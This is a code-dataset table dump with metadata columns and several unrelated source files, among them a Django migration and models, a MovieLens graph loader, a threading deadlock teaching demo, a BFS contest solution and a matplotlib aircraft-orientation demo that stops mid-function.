blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5ec1ee7bdb19d74f99bf937bc26b51227ed5e769 | 9c718b8964d476db4728fc0cf18e24292dd8cf60 | /MxOnline/apps/courses/migrations/0007_video_url.py | eb778b67fab3773e760b7adfb23e88345a338691 | [] | no_license | 1400720231/Django-Projects | 960f9226e0f5c01628afd65b9a78e810fdeb1b83 | 72f96788163f7ffe76e7599966ddbfa1d2199926 | refs/heads/master | 2021-06-25T17:41:14.147011 | 2019-04-03T02:24:38 | 2019-04-03T02:24:38 | 114,955,012 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2018-02-20 18:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``url`` CharField to the ``video`` model.

    Auto-generated by Django 1.10.1 ``makemigrations``; applied with
    ``manage.py migrate``.  The ``default=''`` backfills existing rows so
    the column can be added without a data migration.
    """

    dependencies = [
        # Must run after the previous migration in the 'courses' app.
        ('courses', '0006_auto_20180220_1535'),
    ]

    operations = [
        migrations.AddField(
            model_name='video',
            name='url',
            # verbose_name is the Chinese admin label ("access address").
            field=models.CharField(default='', max_length=200, verbose_name='访问地址'),
        ),
    ]
| [
"937886362@qq.com"
] | 937886362@qq.com |
87f111c9190d4f0e1168bed1af78f8024c31c36c | fd717fe6ca74f6d77210cdd57a8c365d27c5bfc6 | /pychron/database/records/power_map_record.py | 130d5dbfa486a1f9890af0689a7ca5fca6defcc4 | [
"Apache-2.0"
] | permissive | stephen-e-cox/pychron | 1dea0467d904d24c8a3dd22e5b720fbccec5c0ed | 681d5bfe2c13e514859479369c2bb20bdf5c19cb | refs/heads/master | 2021-01-19T15:40:03.663863 | 2016-07-14T14:37:16 | 2016-07-14T14:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,306 | py | # ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Bool, Instance, Enum, Range, on_trait_change, Any
from traitsui.api import HGroup, Group, Item, spring , VGroup
from pychron.database.records.sqlite_record import SQLiteRecord
# ============= standard library imports ========================
# import os
import csv
from pychron.managers.data_managers.h5_data_manager import H5DataManager
from pychron.graph.contour_graph import ContourGraph
# ============= local library imports ==========================
# def load_graph(self, graph=None, xoffset=0):
#
# if graph is None:
# graph = self._graph_factory(klass=TimeSeriesGraph)
# graph.new_plot(xtitle='Time',
# ytitle='Value',
# padding=[40, 10, 10, 40]
# )
#
# xi, yi = self._get_data()
# if xi is not None:
# graph.new_series(array(xi) + xoffset, yi)
#
# self.graph = graph
#
# return max(xi)
#
# def _get_data(self):
# dm = self._data_manager_factory()
# dm.open_data(self._get_path())
# xi = None
# yi = None
# if isinstance(dm, H5DataManager):
# s1 = dm.get_table('scan1', 'scans')
# if s1 is not None:
# xi, yi = zip(*[(r['time'], r['value']) for r in s1.iterrows()])
# else:
# self._loadable = False
# else:
# da = dm.read_data()
# if da is not None:
# xi, yi = da
# return xi, yi
class PowerMapRecord(SQLiteRecord):
    """Database record for a laser power map, viewable as a 2D contour
    graph and an interactive 3D surface/contour plot (Traits UI)."""

    title_str = 'PowerMap'
    resizable = True
    # graph3D = Instance(Graph3D, ())
    graph3D = Any  # Instance(Graph3D, ())   # lazy: see _graph3D_default below
    graph = Instance(ContourGraph)           # 2D contour view of the map
    vertical_ex = Range(1, 100)              # vertical exaggeration for 3D
    surf = Bool(True)                        # show surface plot
    surf_outline = Bool(True)
    contour = Bool(False)                    # show 3D contour plot
    contour_outline = Bool(False)
    levels = Range(4, 20)                    # number of contour levels
    representation = Enum('surface', 'wireframe', 'points')

    def initialize(self):
        """Load the graphs when the record is first opened; always
        reports success."""
        self.load_graph()
        return True

    # Redraw the 3D scene whenever any display option changes.
    @on_trait_change('surf+, contour+,\
                      representation, levels,\
                      vertical_ex\
                      ')
    def refresh_graph3d(self):
        self.graph3D.clear()
        self.load_graph()

    def traits_view(self):
        """Build the tabbed 2D/3D Traits UI layout for this record."""
        twod_graph = Group(Item('graph',
                                show_label=False,
                                style='custom',
                                # height=1.0
                                ),
                           label='2D'
                           )
        # twod_graph = self._get_graph_item()
        # twod_graph.label = '2D'
        # Controls that tweak the 3D rendering (wired to refresh_graph3d).
        ctrl_grp = Group(
            Item('vertical_ex', label='Vertical Ex.'),
            HGroup(Item('contour'),
                   Item('levels'),
                   spring,
                   Item('contour_outline', label='Outline')
                   ),
            HGroup(Item('surf'),
                   Item('representation'),
                   spring,
                   Item('surf_outline', label='Outline')
                   ),
            show_border=True, label='Tweak')
        threed_graph = Group(VGroup(
            Item('graph3D', show_label=False,
                 style='custom'
                 ),
            ctrl_grp
            ),
            label='3D',
            )
        # grps = VGroup(
        grps = Group(
            twod_graph,
            threed_graph,
            layout='tabbed'
        )
        # self._get_info_grp()
        # )
        # grps = twod_graph
        return self._view_factory(grps)

    def load_graph(self):
        """Read the power-map data file and populate both the 2D contour
        graph and the 3D plot(s)."""
        path = self.path
        # path = os.path.join(self.root, self.filename)
        from pychron.lasers.power.power_map_processor import PowerMapProcessor
        pmp = PowerMapProcessor()
        if path.endswith('.h5') or path.endswith('.hdf5'):
            reader = H5DataManager()
            # reader = self._data_manager_factory()
            reader.open_data(path)
        else:
            # NOTE(review): reader.next() is Python 2-only, and this csv
            # reader is bound to a file that is closed once the 'with'
            # block exits -- the open_data/_extract_h5 calls below would
            # fail for the CSV path.  Confirm only HDF5 records reach here.
            with open(path, 'r') as f:
                reader = csv.reader(f)
                # trim off header
                reader.next()
        #
        self.graph = pmp.load_graph(reader)
        self.graph.width = 625
        self.graph.height = 500
        # Re-open and pull the raw Z matrix for the 3D view.
        reader.open_data(path)
        z, _ = pmp._extract_h5(reader)
        if self.surf:
            self.graph3D.plot_data(z, func='surf',
                                   representation=self.representation,
                                   warp_scale=self.vertical_ex,
                                   outline=self.surf_outline
                                   )
        if self.contour:
            self.graph3D.plot_data(z, func='contour_surf',
                                   contours=self.levels,
                                   warp_scale=self.vertical_ex,
                                   outline=self.contour_outline
                                   )

    def _graph3D_default(self):
        # Imported lazily so the (heavy) 3D stack only loads when needed.
        from pychron.graph.graph3D import Graph3D
        return Graph3D()
# def traits_view(self):
# v = View()
# return v
# ============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
ec707a98e97489c8d21cc1494e91807c9ccc0da2 | e8b0dcef3fda2cde71ff3a193af2524456783a24 | /examples/pytorch/recommendation/rec/datasets/movielens.py | 0caf1fece950170f7e74b2dfc79f859a0fcb7063 | [
"Apache-2.0"
] | permissive | Menooker/dgl | 79daba49407e2f113d61ba8fab0902c51993b060 | 170c2ed46fde29271246fe6600948b2864534ca3 | refs/heads/master | 2021-01-15T06:00:46.706097 | 2020-04-01T02:10:25 | 2020-04-01T02:10:25 | 242,896,301 | 3 | 0 | Apache-2.0 | 2020-02-25T03:01:25 | 2020-02-25T03:01:24 | null | UTF-8 | Python | false | false | 8,159 | py | import pandas as pd
import dgl
import os
import torch
import numpy as np
import scipy.sparse as sp
import time
from functools import partial
from .. import randomwalk
import stanfordnlp
import re
import tqdm
import string
class MovieLens(object):
    """MovieLens-1M loader that parses users/movies/ratings, makes a
    per-user train/valid/test split, and builds a bipartite user-movie
    DGL graph with user, genre, year and bag-of-words title features."""

    def __init__(self, directory):
        '''
        directory: path to movielens directory which should have the three
        files:
        users.dat
        movies.dat
        ratings.dat
        '''
        self.directory = directory

        users = []
        movies = []
        ratings = []

        # read users
        with open(os.path.join(directory, 'users.dat')) as f:
            for l in f:
                id_, gender, age, occupation, zip_ = l.strip().split('::')
                users.append({
                    'id': int(id_),
                    'gender': gender,
                    'age': age,
                    'occupation': occupation,
                    'zip': zip_,
                })
        self.users = pd.DataFrame(users).set_index('id').astype('category')

        # read movies
        with open(os.path.join(directory, 'movies.dat'), encoding='latin1') as f:
            for l in f:
                id_, title, genres = l.strip().split('::')
                genres_set = set(genres.split('|'))

                # extract year (titles always end with "(YYYY)")
                assert re.match(r'.*\([0-9]{4}\)$', title)
                year = title[-5:-1]
                title = title[:-6].strip()

                # one boolean column per genre; missing genres become False below
                data = {'id': int(id_), 'title': title, 'year': year}
                for g in genres_set:
                    data[g] = True
                movies.append(data)
        self.movies = (
            pd.DataFrame(movies)
            .set_index('id')
            .fillna(False)
            .astype({'year': 'category'}))
        # genre columns are exactly the boolean columns of the frame
        self.genres = self.movies.columns[self.movies.dtypes == bool]

        # read ratings
        with open(os.path.join(directory, 'ratings.dat')) as f:
            for l in f:
                user_id, movie_id, rating, timestamp = [int(_) for _ in l.split('::')]
                ratings.append({
                    'user_id': user_id,
                    'movie_id': movie_id,
                    'rating': rating,
                    'timestamp': timestamp,
                })
        ratings = pd.DataFrame(ratings)
        # attach per-movie popularity so split_user can filter rare movies
        movie_count = ratings['movie_id'].value_counts()
        movie_count.name = 'movie_count'
        ratings = ratings.join(movie_count, on='movie_id')
        self.ratings = ratings

        # drop users and movies which do not exist in ratings
        self.users = self.users[self.users.index.isin(self.ratings['user_id'])]
        self.movies = self.movies[self.movies.index.isin(self.ratings['movie_id'])]

        self.data_split()
        self.build_graph()

    def split_user(self, df, filter_counts=False):
        """Assign each selected rating of one user a shuffled uniform
        'prob' in [0, 1); rows not selected keep prob 0."""
        df_new = df.copy()
        df_new['prob'] = 0

        if filter_counts:
            # only ratings of movies seen at least 10 times participate
            df_new_sub = (df_new['movie_count'] >= 10).nonzero()[0]
        else:
            df_new_sub = df_new['train'].nonzero()[0]
        # NOTE(review): Series.nonzero() and the chained
        # df['prob'].iloc[...] assignment below rely on older pandas
        # behaviour -- confirm against the pinned pandas version.
        prob = np.linspace(0, 1, df_new_sub.shape[0], endpoint=False)
        np.random.shuffle(prob)
        df_new['prob'].iloc[df_new_sub] = prob
        return df_new

    def data_split(self):
        """80/10/10 train/valid/test split, stratified per user via the
        shuffled 'prob' column."""
        self.ratings = self.ratings.groupby('user_id', group_keys=False).apply(
                partial(self.split_user, filter_counts=True))
        self.ratings['train'] = self.ratings['prob'] <= 0.8
        self.ratings['valid'] = (self.ratings['prob'] > 0.8) & (self.ratings['prob'] <= 0.9)
        self.ratings['test'] = self.ratings['prob'] > 0.9
        self.ratings.drop(['prob'], axis=1, inplace=True)

    def build_graph(self):
        """Build the bipartite DGL graph: users occupy node ids
        [0, n_users), movies [n_users, n_users + n_movies); rating edges
        are added in both directions with an 'inv' flag."""
        user_ids = list(self.users.index)
        movie_ids = list(self.movies.index)
        user_ids_invmap = {id_: i for i, id_ in enumerate(user_ids)}
        movie_ids_invmap = {id_: i for i, id_ in enumerate(movie_ids)}
        self.user_ids = user_ids
        self.movie_ids = movie_ids
        self.user_ids_invmap = user_ids_invmap
        self.movie_ids_invmap = movie_ids_invmap

        g = dgl.DGLGraph()
        g.add_nodes(len(user_ids) + len(movie_ids))

        # user features: categorical codes shifted by one
        for user_column in self.users.columns:
            udata = torch.zeros(g.number_of_nodes(), dtype=torch.int64)
            # 0 for padding
            udata[:len(user_ids)] = \
                torch.LongTensor(self.users[user_column].cat.codes.values.astype('int64') + 1)
            g.ndata[user_column] = udata

        # movie genre: multi-hot float matrix on the movie nodes
        movie_genres = torch.from_numpy(self.movies[self.genres].values.astype('float32'))
        g.ndata['genre'] = torch.zeros(g.number_of_nodes(), len(self.genres))
        g.ndata['genre'][len(user_ids):len(user_ids) + len(movie_ids)] = movie_genres

        # movie year
        g.ndata['year'] = torch.zeros(g.number_of_nodes(), dtype=torch.int64)
        # 0 for padding
        g.ndata['year'][len(user_ids):len(user_ids) + len(movie_ids)] = \
            torch.LongTensor(self.movies['year'].cat.codes.values.astype('int64') + 1)

        # movie title: lemmatize with StanfordNLP, drop pure-punctuation tokens
        nlp = stanfordnlp.Pipeline(use_gpu=False, processors='tokenize,lemma')
        vocab = set()
        title_words = []
        for t in tqdm.tqdm(self.movies['title'].values):
            doc = nlp(t)
            words = set()
            for s in doc.sentences:
                words.update(w.lemma.lower() for w in s.words
                             if not re.fullmatch(r'[' + string.punctuation + ']+', w.lemma))
            vocab.update(words)
            title_words.append(words)
        vocab = list(vocab)
        vocab_invmap = {w: i for i, w in enumerate(vocab)}
        # bag-of-words title feature over the whole vocabulary
        g.ndata['title'] = torch.zeros(g.number_of_nodes(), len(vocab))
        for i, tw in enumerate(tqdm.tqdm(title_words)):
            g.ndata['title'][len(user_ids) + i, [vocab_invmap[w] for w in tw]] = 1
        self.vocab = vocab
        self.vocab_invmap = vocab_invmap

        # rating edges: user -> movie ('inv'=0) and movie -> user ('inv'=1)
        rating_user_vertices = [user_ids_invmap[id_] for id_ in self.ratings['user_id'].values]
        rating_movie_vertices = [movie_ids_invmap[id_] + len(user_ids)
                                 for id_ in self.ratings['movie_id'].values]
        self.rating_user_vertices = rating_user_vertices
        self.rating_movie_vertices = rating_movie_vertices

        g.add_edges(
            rating_user_vertices,
            rating_movie_vertices,
            data={'inv': torch.zeros(self.ratings.shape[0], dtype=torch.uint8)})
        g.add_edges(
            rating_movie_vertices,
            rating_user_vertices,
            data={'inv': torch.ones(self.ratings.shape[0], dtype=torch.uint8)})
        self.g = g

    def generate_mask(self):
        """Endless generator of (prior_mask, train_mask) pairs: training
        ratings are re-split 5 ways, each fifth taking a turn as the
        'train' part while the rest serve as 'prior'."""
        while True:
            ratings = self.ratings.groupby('user_id', group_keys=False).apply(self.split_user)
            prior_prob = ratings['prob'].values
            for i in range(5):
                train_mask = (prior_prob >= 0.2 * i) & (prior_prob < 0.2 * (i + 1))
                prior_mask = ~train_mask
                # restrict both masks to rows marked train in data_split()
                train_mask &= ratings['train'].values
                prior_mask &= ratings['train'].values
                yield prior_mask, train_mask

    def refresh_mask(self):
        """Advance to the next prior/train mask and write all four edge
        masks onto both edge directions of the graph."""
        if not hasattr(self, 'masks'):
            self.masks = self.generate_mask()
        prior_mask, train_mask = next(self.masks)

        valid_tensor = torch.from_numpy(self.ratings['valid'].values.astype('uint8'))
        test_tensor = torch.from_numpy(self.ratings['test'].values.astype('uint8'))
        train_tensor = torch.from_numpy(train_mask.astype('uint8'))
        prior_tensor = torch.from_numpy(prior_mask.astype('uint8'))
        edge_data = {
            'prior': prior_tensor,
            'valid': valid_tensor,
            'test': test_tensor,
            'train': train_tensor,
        }

        self.g.edges[self.rating_user_vertices, self.rating_movie_vertices].data.update(edge_data)
        self.g.edges[self.rating_movie_vertices, self.rating_user_vertices].data.update(edge_data)
| [
"noreply@github.com"
] | Menooker.noreply@github.com |
74e2344e3bf94ca0eacd4283bbbeb33100bdf144 | 6caab8d886e8bd302d1994ff663cf5ccb5e11522 | /MyNotes_01/Step02/4-Concurrent/day03_09/demo12_dead_lock.py | 7cfadfec8a87614f6d0a798a678a98c857765851 | [] | no_license | ZimingGuo/MyNotes01 | 7698941223c79ee754b17296b9984b731858b238 | 55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6 | refs/heads/master | 2022-07-30T21:30:32.100042 | 2020-05-19T16:59:09 | 2020-05-19T16:59:09 | 265,254,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,758 | py | # author: Ziming Guo
# time: 2020/3/31
'''
demo_dead_lock:
'''
from time import sleep
from threading import Thread, Lock
# 交易类
class Account():
    """A bank account owned by one user, with its own lock.

    The lock is held by callers (see ``transfer``) while the balance is
    being changed; the class itself performs no locking.
    """

    def __init__(self, _id, balance, lock):
        self.id = _id            # owner identifier
        self.balance = balance   # current funds
        self.lock = lock         # per-account mutex, managed by callers

    def withdraw(self, amount):
        """Remove ``amount`` from the balance."""
        self.balance = self.balance - amount

    def deposit(self, amount):
        """Add ``amount`` to the balance."""
        self.balance = self.balance + amount

    def get_balance(self):
        """Current balance."""
        return self.balance
# Create two accounts; each user owns a private lock guarding its balance.
Tom = Account('Tom', 5000, Lock())
Alex = Account('Alex', 8000, Lock())
# 模拟一个转账的过程
def transfer(from_, to, amount):
    """Move *amount* from account *from_* to account *to*.

    Deliberately deadlock-prone demo: the payer's lock is held across a
    sleep while the receiver's lock is acquired.  Two opposite-direction
    transfers each grab their own payer lock, then block forever waiting
    for the other's.
    """
    if from_.lock.acquire():        # lock the paying account first
        from_.withdraw(amount)      # debit while holding the payer's lock
        sleep(0.5)                  # widen the race window so the deadlock demo triggers
        if to.lock.acquire():       # then lock the receiving account
            to.deposit(amount)      # credit under the second lock
            to.lock.release()       # release the receiver's lock
        from_.lock.release()        # release the payer's lock
    print("%s 给 %s 转账 %d" % (from_.id, to.id, amount))
# A single one-off transfer completes fine.
transfer(Tom, Alex, 4000)

t1 = Thread(target=transfer, args=(Tom, Alex, 2000))
t2 = Thread(target=transfer, args=(Alex, Tom, 3500))

# Special case: Tom pays Alex while Alex simultaneously pays Tom.
# Each thread holds its own payer's lock and waits on the other's,
# so this deadlocks and the joins below never return.
t1.start()
t2.start()
t1.join()
t2.join()
| [
"guoziming99999@icloud.com"
] | guoziming99999@icloud.com |
fac612177f53a4d7c75a80e5625418495ff1526b | 1f813c3cd6a9d293acfbc81f198c64f816a9a95d | /build/gazebo_msgs/catkin_generated/generate_cached_setup.py | fb96ff1529bff413e751a55b32cc355d9b1ca061 | [] | no_license | koteshrv/Vargi_Bots_1418 | 5ada79746785a9f9cc0e1d686a1dd2702c9e0f0f | 6bcf843c7150c93caee2b596e0864749c51b6155 | refs/heads/main | 2023-01-06T03:42:53.555701 | 2020-11-08T17:36:59 | 2020-11-08T17:36:59 | 302,916,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,322 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# NOTE: this file is auto-generated by catkin for the gazebo_msgs package;
# it caches the workspace environment into an executable setup script.
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
    sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
    from catkin.environment_cache import generate_environment_script
except ImportError:
    # search for catkin package in all workspaces and prepend to path
    for workspace in '/home/kotesh/catkin_ws/devel;/opt/ros/melodic'.split(';'):
        python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
        if os.path.isdir(os.path.join(python_path, 'catkin')):
            sys.path.insert(0, python_path)
            break
    from catkin.environment_cache import generate_environment_script

# Render the cached environment script and write it next to the build files.
code = generate_environment_script('/home/kotesh/catkin_ws/devel/.private/gazebo_msgs/env.sh')

output_filename = '/home/kotesh/catkin_ws/build/gazebo_msgs/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
    # print('Generate script for cached setup "%s"' % output_filename)
    f.write('\n'.join(code))

# Mark the generated script executable for its owner.
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"kkotesh100@gmail.com"
] | kkotesh100@gmail.com |
0da03225afbcf284ba55cf1f6e0ac7ec5f9eef7e | 7933d55de7e2d3a9e78a372fa76f064f5ed5eb6f | /maths/solutions_printing.py | c9eb70fbad5598e1f5f8b71bc4e0ae58c60e772c | [] | no_license | o2edu/MathsExams | 4921f6683e1d6d96aa834d5b01f30bd66522887d | 8e2c0aeba6bbad52103c420747ead1dad6380408 | refs/heads/master | 2021-05-29T17:42:32.442055 | 2014-05-31T10:18:12 | 2014-05-31T10:18:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 439 | py | import sympy
def substitute(expr, var, value):
    """Return the LaTeX for *expr* with *var*'s LaTeX textually replaced
    by *value*'s LaTeX.

    The replacement is purely string-level, which shows the substitution
    step (e.g. a bound plugged into an antiderivative) without sympy
    re-evaluating or simplifying the expression.
    """
    latex = sympy.latex(expr)
    # Fix: removed a stray debug print of the intermediate LaTeX string.
    # NOTE: assumes var's LaTeX appears literally in the rendered
    # expression (true for plain symbols such as x).
    latex = latex.replace(sympy.latex(var), sympy.latex(value))
    return latex
def integral_working(expr, var, l, h):
    """Render the evaluated-integral step ``(F(h)) - (F(l))`` in LaTeX.

    The upper bound's substitution goes in the left bracket pair and the
    lower bound's in the right, matching the usual F(x) evaluated from
    l to h presentation.
    """
    upper = substitute(expr, var, h)  # upper bound goes on the left
    lower = substitute(expr, var, l)  # lower bound goes on the right
    return r'\left({0}\right) - \left({1}\right)'.format(upper, lower)
| [
"ben.lucato@gmail.com"
] | ben.lucato@gmail.com |
de58538e32e4fab5da02e44f5307d9f8381e1187 | 2fa05752244c2ab39c108c11ab2dc22f4f9e9ad0 | /Events/models.py | 21a3d293241fbf3a2f10e964028a4f94d626d2d1 | [
"Apache-2.0"
] | permissive | CiganOliviu/cigan_enterprize | b88aebcb27ec97dd229e67cbb5bea3199cc8b5ce | 8a4f4c06197655622ca08f92ec793add7d0be0cd | refs/heads/main | 2023-03-04T05:28:11.376109 | 2021-02-14T20:38:29 | 2021-02-14T20:38:29 | 333,212,689 | 0 | 0 | Apache-2.0 | 2021-02-14T20:38:29 | 2021-01-26T20:45:44 | null | UTF-8 | Python | false | false | 2,284 | py | from django.db import models
class PastEvent(models.Model):
    """An event that has already taken place, shown in the archive.

    NOTE(review): nearly identical to SponsorEvent/HostEvent except for
    the slug field name (``past_event_slug`` vs ``event_slug``) -- an
    abstract base model would remove the duplication.
    """
    event_name = models.CharField(max_length=200)
    location = models.CharField(max_length=200)
    space = models.CharField(max_length=200)
    part_of_event = models.CharField(max_length=200, blank=True)
    introduction = models.CharField(max_length=300, default="")
    about_event = models.TextField(default="")
    get_tickets = models.URLField(max_length=200)   # external ticketing URL
    cover_image = models.ImageField(upload_to='events/cover/', default='default.jpg')
    location_image = models.ImageField(upload_to='events/location/', default='default.jpg')
    date = models.DateTimeField()
    past_event_slug = models.SlugField(max_length=200, unique=True, default="")

    def __str__(self):
        # Human-readable name in the admin and shell.
        return self.event_name
class SponsorEvent(models.Model):
    """An event the organization sponsors; same shape as HostEvent."""
    event_name = models.CharField(max_length=200)
    location = models.CharField(max_length=200)
    space = models.CharField(max_length=200)
    part_of_event = models.CharField(max_length=200, blank=True)
    introduction = models.CharField(max_length=300, default="")
    about_event = models.TextField(default="")
    get_tickets = models.URLField(max_length=200)   # external ticketing URL
    cover_image = models.ImageField(upload_to='events/cover/', default='default.jpg')
    location_image = models.ImageField(upload_to='events/location/', default='default.jpg')
    date = models.DateTimeField()
    event_slug = models.SlugField(max_length=200, unique=True, default="")

    def __str__(self):
        # Human-readable name in the admin and shell.
        return self.event_name
class HostEvent(models.Model):
    """An event the organization hosts; same shape as SponsorEvent."""
    event_name = models.CharField(max_length=200)
    location = models.CharField(max_length=200)
    space = models.CharField(max_length=200)
    part_of_event = models.CharField(max_length=200, blank=True)
    introduction = models.CharField(max_length=300, default="")
    about_event = models.TextField(default="")
    get_tickets = models.URLField(max_length=200)   # external ticketing URL
    cover_image = models.ImageField(upload_to='events/cover/', default='default.jpg')
    location_image = models.ImageField(upload_to='events/location/', default='default.jpg')
    date = models.DateTimeField()
    event_slug = models.SlugField(max_length=200, unique=True, default="")

    def __str__(self):
        # Human-readable name in the admin and shell.
        return self.event_name
| [
"ciganoliviudavid@gmail.com"
] | ciganoliviudavid@gmail.com |
7681fbbf18fcd73148a18090ee3dc623e67524c3 | 999f3f3da1cb70cb5872f99a09d65d7c4df71cf7 | /src/data/422.py | c9f4348a402a94ccc58fe6c9159dfcb7a2658c86 | [
"MIT"
] | permissive | NULLCT/LOMC | 0f0d1f01cce1d5633e239d411565ac7f0c687955 | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | refs/heads/main | 2023-07-27T17:03:46.703022 | 2021-09-04T08:58:45 | 2021-09-04T08:58:45 | 396,290,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,147 | py | import sys
def input():
    # Fast stdin reader (competitive-programming idiom; shadows builtin input).
    return sys.stdin.readline().rstrip()

from collections import deque

n, q = map(int, input().split())  # number of vertices and number of queries

# Read the tree as an undirected adjacency list (n-1 edges, 1-based input).
graph = [[] for _ in range(n)]
for i in range(n - 1):
    a, b = map(int, input().split())
    a -= 1
    b -= 1
    graph[a].append(b)
    graph[b].append(a)

dist = [-1] * n  # initialize every vertex to -1 (unvisited)
pos = deque()    # BFS queue

# Initial condition: start the search from vertex 0.
dist[0] = 0
pos.append(0)

# Breadth-first search (runs until the queue is empty).
while len(pos) > 0:
    v = pos.popleft()  # take the vertex at the front of the queue
    for nv in graph[v]:
        # skip vertices that were already visited
        if dist[nv] != -1:
            continue
        # record the distance of the new vertex nv and enqueue it
        dist[nv] = dist[v] + 1
        pos.append(nv)

# For each query: equal parity of depths means an even path length, so the
# midpoint falls on a town (vertex); odd means it falls on a road (edge).
for i in range(q):
    c, d = map(int, input().split())
    c -= 1
    d -= 1
    if (dist[c] + dist[d]) % 2 == 0:
        print("Town")
    else:
        print("Road")
| [
"cockatiel.u10@gmail.com"
] | cockatiel.u10@gmail.com |
b7cd2b10ebf6dfaa8b82fd393ae5c7eb222e452b | e76017111250067edf5fb563cf2e483badc68ece | /chap2/transforms.py | ca28ed1d6cdeb350b8ffd3b54badf1f87a155ea3 | [] | no_license | jaringson/Flight_Dynamics | f64108ec816e9606bcdddb0b5814992182e8b3ed | abaf667e154e9005c5160c68cdcb48a882e0c48e | refs/heads/master | 2021-05-11T16:03:45.597431 | 2018-04-13T20:53:28 | 2018-04-13T20:53:28 | 117,749,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,802 | py |
from numpy import pi, sin
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# import matplotlib.animation as animation
from matplotlib.widgets import Slider
def draw_plane_nwu(plane_in):
    """Convert NED (north-east-down) body points to NWU plot coordinates.

    Negates the east and down rows (Y and Z) so the aircraft renders
    with west to the left and up upward, and returns the x, y and z
    coordinate rows separately, ready to splat into ``Axes3D.plot``.
    """
    ned_to_nwu = np.diag([1, -1, -1])
    pts = ned_to_nwu.dot(plane_in)
    return pts[0, :], pts[1, :], pts[2, :]
# Interactive demo: draw a stick aeroplane in 3D and expose azimuth /
# elevation / tilt sliders; moving a slider re-rotates the model and
# prints the recovered yaw/pitch/roll Euler angles.
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')

# Adjust the subplots region to leave some space for the sliders and buttons
fig.subplots_adjust(bottom=0.25)
t = np.arange(0.0, 1.0, 0.001)
azim_0 = 0
ele_0 = 0
tilt_0 = 0

# plane in ned: columns are the 3D vertices of a stick-figure aircraft
plane = np.array([[0,0,0],
                  [0.5,0,0],
                  [0.1,0,0],
                  [0,0.5,-0.1],  #left wing
                  [0.1,0,0],
                  [0,-0.5,-0.1],  #right wing
                  [0.1,0,0],
                  [-0.5,0,0],
                  [-0.5,0,-0.25],
                  [-0.5,0.1,-0.25],
                  [-0.5,-0.1,-0.25]]).T

# Draw the initial plot
# The 'line' variable is used for modifying the line later
[line] = ax.plot(*draw_plane_nwu(np.array([[-1,0,0],[0,-1,0],[0,0,1]]).dot(plane)), linewidth=2, color='red')
# [line2] = ax.plot(*draw_plane_nwu(np.array([[-1,0,0],[0,-1,0],[0,0,1]]).dot(plane)), linewidth=2, color='blue')
ax.set_xlim([-1, 1])
ax.set_ylim([-1, 1])
ax.set_zlim([-1, 1])
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')

# Define an axes area and draw a slider in it
# NOTE(review): 'axisbg' is the old matplotlib keyword (renamed
# 'facecolor' in later releases) -- confirm the pinned matplotlib.
azim_slider_ax = fig.add_axes([0.15, 0.15, 0.7, 0.03], axisbg='white')
azim_slider = Slider(azim_slider_ax, 'Azim', -180.0, 180.0, valinit=azim_0)

# Draw another slider
ele_slider_ax = fig.add_axes([0.325, 0.1, 0.35, 0.03], axisbg='white')
ele_slider = Slider(ele_slider_ax, 'Elev', -90.0, 90.0, valinit=ele_0)

# Draw another slider
tilt_slider_ax = fig.add_axes([0.15, 0.05, 0.7, 0.03], axisbg='white')
tilt_slider = Slider(tilt_slider_ax, 'Tilt', -180.0, 180.0, valinit=tilt_0)

# Define an action for modifying the line when any slider's value changes
def sliders_on_changed(val):
    azim = np.radians(azim_slider.val)
    ele = np.radians(ele_slider.val)
